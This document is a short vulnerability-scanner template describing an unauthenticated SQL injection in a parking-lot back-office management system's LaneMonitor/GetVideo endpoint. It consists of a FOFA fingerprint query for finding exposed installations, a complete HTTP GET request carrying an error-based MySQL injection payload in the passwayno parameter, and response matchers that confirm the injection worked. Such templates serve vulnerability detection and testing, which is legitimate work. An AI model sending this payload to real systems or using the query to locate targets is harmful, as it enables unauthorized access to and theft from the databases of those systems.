## id: VEID-2025-0103
## name: 停车场后台管理系统GetVideo存在SQL注入漏洞
## author: hack007x
## severity: critical
## tags: veid,sql,veid2025
## description:停车场后台管理系统 LaneMonitor/GetVideo 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
## fofa-query: icon_hash="938984120"
## verification: true


GET /LaneMonitor/GetVideo?passwayno=1%27+AND+GTID_SUBSET%28CONCAT%280x68656c6c6f7665696c%2C%28SELECT+%28ELT%283079%3D3079%2C1%29%29%29%2C0x7176786b71%29%2C3079%29+AND+%27OVwj%27%3D%27OVwj HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}


#@ condition: and
#@ matcher: status_code == 200
#@ matcher: header["Content-Type"] contains "json" 
#@ matcher: body contains "helloveil1" && body contains "success"





# @VEIL-STAMP: 81b3277ca952208b995cb6a75556bfbbdaa3557393667c53d447615b8983772c
